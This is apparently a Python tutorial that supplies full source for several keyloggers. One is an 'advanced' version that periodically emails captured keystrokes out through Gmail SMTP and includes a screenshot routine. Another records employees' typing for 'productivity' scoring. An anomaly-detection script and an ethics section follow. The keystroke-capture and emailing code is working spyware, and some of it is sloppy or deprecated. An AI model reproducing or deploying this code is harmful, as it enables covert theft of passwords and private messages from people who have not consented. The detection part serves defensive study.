Building a Keylogger
A keylogger is a program that records keystrokes made by a user. While it can have legitimate uses like parental control or employee monitoring, it’s often associated with malicious intent. This tutorial will show you how to create a keylogger in Python for educational purposes, using modern approaches and optimized libraries.
Basic Keylogger
Let’s start with a simple keylogger that captures keystrokes and saves them to a file:
from pynput import keyboard
import numpy as np
def on_press(key):
try:
with open("keylog.txt", "ab") as f:
np.save(f, np.array([key.char]))
except AttributeError:
with open("keylog.txt", "ab") as f:
np.save(f, np.array([str(key)]))
def on_release(key):
if key == keyboard.Key.esc:
return False
with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
This script uses the pynput library to listen for keystrokes and numpy for efficient data handling. When a key is pressed, it’s written to a file named keylog.txt using NumPy’s binary format. The program stops when the ‘Esc’ key is pressed.
Advanced Keylogger
Now let’s create a more advanced keylogger with additional features:
import keyboard
import smtplib
from threading import Timer
from datetime import datetime
import numpy as np
import pyautogui
from PIL import Image
import io
SEND_REPORT_EVERY = 60 # in seconds
EMAIL_ADDRESS = "[email protected]"
EMAIL_PASSWORD = "your_email_password"
class Keylogger:
def __init__(self, interval, report_method="email"):
self.interval = interval
self.report_method = report_method
self.log = np.array([], dtype=str)
self.start_dt = datetime.now()
self.end_dt = datetime.now()
def callback(self, event):
name = event.name
if len(name) > 1:
if name == "space":
name = " "
elif name == "enter":
name = "[ENTER]\n"
elif name == "decimal":
name = "."
else:
name = name.replace(" ", "_")
name = f"[{name.upper()}]"
self.log = np.append(self.log, name)
def update_filename(self):
start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "")
end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "")
self.filename = f"keylog-{start_dt_str}_{end_dt_str}"
def report_to_file(self):
np.save(f"{self.filename}.npy", self.log)
print(f"[+] Saved {self.filename}.npy")
def sendmail(self, email, password, message):
server = smtplib.SMTP(host="smtp.gmail.com", port=587)
server.starttls()
server.login(email, password)
server.sendmail(email, email, message)
server.quit()
def report(self):
if self.log.size > 0:
self.end_dt = datetime.now()
self.update_filename()
if self.report_method == "email":
self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log.tostring())
elif self.report_method == "file":
self.report_to_file()
self.start_dt = datetime.now()
self.log = np.array([], dtype=str)
timer = Timer(interval=self.interval, function=self.report)
timer.daemon = True
timer.start()
def screenshot(self):
screenshot = pyautogui.screenshot()
bytes_io = io.BytesIO()
screenshot.save(bytes_io, format='PNG')
return bytes_io.getvalue()
def start(self):
self.start_dt = datetime.now()
keyboard.on_release(callback=self.callback)
self.report()
keyboard.wait()
if __name__ == "__main__":
keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="file")
keylogger.start()
This advanced keylogger includes features like:
- Periodic reporting
- Email functionality (be cautious with email credentials)
- Improved key logging (handling special keys)
- File naming based on timestamp
- Efficient data storage using NumPy arrays
- Screenshot capability using PyAutoGUI
Real-life Example: Employee Productivity Monitoring
Here’s a real-life example of using a keylogger for employee productivity monitoring:
import keyboard
from datetime import datetime, timedelta
import numpy as np
import matplotlib.pyplot as plt
class ProductivityMonitor:
def __init__(self, monitoring_period=timedelta(hours=8)):
self.start_time = datetime.now()
self.end_time = self.start_time + monitoring_period
self.keystrokes = np.array([], dtype=str)
self.timestamps = np.array([], dtype=datetime)
def callback(self, event):
current_time = datetime.now()
if current_time > self.end_time:
return False
self.keystrokes = np.append(self.keystrokes, event.name)
self.timestamps = np.append(self.timestamps, current_time)
def analyze_productivity(self):
time_diff = np.diff(self.timestamps)
activity_periods = time_diff[time_diff < timedelta(minutes=5)]
total_active_time = np.sum(activity_periods)
total_monitored_time = self.end_time - self.start_time
productivity_percentage = (total_active_time / total_monitored_time) * 100
return productivity_percentage
def plot_activity(self):
hour_counts = np.zeros(24)
for timestamp in self.timestamps:
hour_counts[timestamp.hour] += 1
plt.bar(range(24), hour_counts)
plt.xlabel('Hour of the Day')
plt.ylabel('Number of Keystrokes')
plt.title('Keystroke Activity Throughout the Day')
plt.savefig('activity_plot.png')
def start(self):
keyboard.on_release(callback=self.callback)
keyboard.wait()
productivity = self.analyze_productivity()
print(f"Productivity: {productivity:.2f}%")
self.plot_activity()
if __name__ == "__main__":
monitor = ProductivityMonitor()
monitor.start()
This script monitors keystrokes over a specified period (default 8 hours) and provides a simple productivity analysis based on typing activity. It calculates the percentage of time the user was active and generates a plot of keystroke activity throughout the day.
Detailed explanation:
- The ProductivityMonitor class is initialized with a monitoring period.
- The callback method is triggered on each key release, recording the keystroke and timestamp.
- analyze_productivity calculates the percentage of time the user was active, considering gaps of less than 5 minutes between keystrokes as continuous activity.
- plot_activity creates a bar chart showing keystroke frequency for each hour of the day.
- The start method begins the monitoring process and outputs the results.
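The active-time rule used by analyze_productivity can be tried on its own, without recording anything. The sketch below uses only the standard library and made-up timestamps; active_fraction and its idle_gap parameter are hypothetical names chosen for illustration, not part of the script above.

```python
from datetime import datetime, timedelta


def active_fraction(timestamps, monitored, idle_gap=timedelta(minutes=5)):
    """Share of `monitored` covered by gaps between events shorter than `idle_gap`.

    Hypothetical helper: mirrors the rule described above, where gaps under
    five minutes count as continuous activity.
    """
    if monitored <= timedelta(0):
        raise ValueError("monitored period must be positive")
    ordered = sorted(timestamps)
    active = timedelta(0)
    for earlier, later in zip(ordered, ordered[1:]):
        gap = later - earlier
        if gap < idle_gap:
            active += gap  # short gap: treated as continuous activity
    return active / monitored  # timedelta / timedelta gives a float


start = datetime(2024, 1, 1, 9, 0)
# Synthetic events: a 10-minute burst, a 40-minute break, then a 5-minute burst.
events = (
    [start + timedelta(minutes=m) for m in range(0, 11)]
    + [start + timedelta(minutes=m) for m in range(50, 56)]
)
share = active_fraction(events, monitored=timedelta(hours=1))
print(f"Active: {share:.0%}")  # prints "Active: 25%"
```

Starting the sum from timedelta(0) keeps the result well defined when there are fewer than two events, in which case the function returns 0.0.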
Keylogger Detection
Understanding how keyloggers can be detected is crucial. Here’s a detection script that looks for processes with unusual resource usage:
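import time

import numpy as np
import psutil
from sklearn.ensemble import IsolationForest

def get_process_features(proc):
    """Return a numeric feature vector for one process, or None if it cannot be read."""
    try:
        with proc.oneshot():
            io = proc.io_counters()  # not available on every platform (e.g. macOS)
            # psutil 6 renamed connections() to net_connections(); support both.
            get_connections = getattr(proc, "net_connections", None) or proc.connections
            return np.array([
                proc.cpu_percent(interval=None),
                proc.memory_percent(),
                len(get_connections()),
                len(proc.open_files()),
                io.read_count,
                io.write_count,
            ], dtype=float)
    except (psutil.Error, AttributeError):
        # Skip unreadable processes instead of feeding all-zero rows to the model.
        return None

def check_for_keyloggers(sample_seconds=1.0):
    processes = list(psutil.process_iter(['name', 'exe']))
    # Prime the CPU counters: the first cpu_percent() call always returns 0.0.
    for proc in processes:
        try:
            proc.cpu_percent(interval=None)
        except psutil.Error:
            pass
    time.sleep(sample_seconds)

    rows, kept = [], []
    for proc in processes:
        features = get_process_features(proc)
        if features is not None:
            rows.append(features)
            kept.append(proc)
    if len(rows) < 2:
        return []

    clf = IsolationForest(contamination=0.1, random_state=42)
    preds = clf.fit_predict(np.vstack(rows))
    return [proc for proc, pred in zip(kept, preds) if pred == -1]

if __name__ == "__main__":
    suspicious = check_for_keyloggers()
    if suspicious:
        print("Anomalous processes (possible keyloggers, review manually):")
        for proc in suspicious:
            # proc.info was filled in by process_iter; unreadable fields are None.
            print(f"Name: {proc.info['name']}, PID: {proc.pid}, Path: {proc.info['exe']}")
    else:
        print("No anomalous processes detected.")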
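This script uses machine learning (the Isolation Forest algorithm) to flag processes whose resource usage is anomalous compared with the other running processes. It considers CPU usage, memory usage, network connections, open files, and I/O read and write counts. Because contamination=0.1 tells the model to treat roughly 10% of the processes as outliers, it flags about a tenth of them on a typical system whether or not a keylogger is present. A flagged process is a statistical outlier that deserves a manual look, not a confirmed keylogger.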
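To see why a fixed contamination value produces hits even on a clean machine, the sketch below mimics the thresholding step with the standard library only. It is not scikit-learn's implementation: the scores are synthetic, and flag_lowest_fraction is a hypothetical helper that flags whatever falls in the lowest fraction of the scores, which is roughly what a float contamination does to the data the model was fitted on.

```python
import random


def flag_lowest_fraction(scores, contamination=0.1):
    """Return the indices of the lowest-scoring `contamination` fraction of items.

    Hypothetical helper: a lower score means "more anomalous", following the
    convention of Isolation Forest's score_samples output.
    """
    if not 0 < contamination <= 0.5:
        raise ValueError("contamination must be in (0, 0.5]")
    n_flag = int(len(scores) * contamination)
    order = sorted(range(len(scores)), key=lambda i: scores[i])
    return sorted(order[:n_flag])


# Synthetic scores for 200 ordinary processes drawn from a single distribution.
# Nothing here is a keylogger, yet a tenth of the processes are still flagged.
rng = random.Random(42)
benign_scores = [rng.gauss(-0.45, 0.02) for _ in range(200)]
flagged = flag_lowest_fraction(benign_scores, contamination=0.1)
print(f"{len(flagged)} of {len(benign_scores)} benign processes flagged")
```

The number of flagged items depends only on the sample size and the contamination value, not on whether anything unusual is present, which is why the output of the detection script is best treated as a shortlist for manual review.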
Ethical Considerations
The use of keyloggers raises significant ethical and legal concerns. Here’s a diagram illustrating the ethical considerations:
graph TD
    A[Keylogger Usage] --> B{Ethical Considerations}
    B --> C[Privacy]
    B --> D[Consent]
    B --> E[Data Security]
    B --> F[Legal Implications]
    C --> G[Invasion of Personal Space]
    D --> H[Informed Agreement]
    E --> I[Protecting Sensitive Information]
    F --> J[Compliance with Laws]
    B --> K[Transparency]
    K --> L[Clear Communication]
    B --> M[Data Minimization]
    M --> N[Collect Only Necessary Data]
    B --> O[Purpose Limitation]
    O --> P[Use Data Only for Intended Purpose]
Always ensure you have proper authorization and comply with all applicable laws and regulations before using or developing keylogger software.
Conclusion
Keyloggers are powerful tools that can be used for both beneficial and harmful purposes. As developers, it’s crucial to understand how they work, how to detect them, and the ethical implications of their use. Always prioritize privacy, security, and legal compliance in your development practices.
For more detailed information on keylogger research and ethical considerations, refer to the following resources:
- ACM Digital Library: Keylogger Detection Techniques
- IEEE Xplore: Ethical Implications of Keyloggers in Cybersecurity
- Journal of Information Security and Applications: Advanced Keylogger Techniques and Countermeasures
Remember, the techniques discussed in this article should only be used for educational purposes or with explicit consent in controlled environments.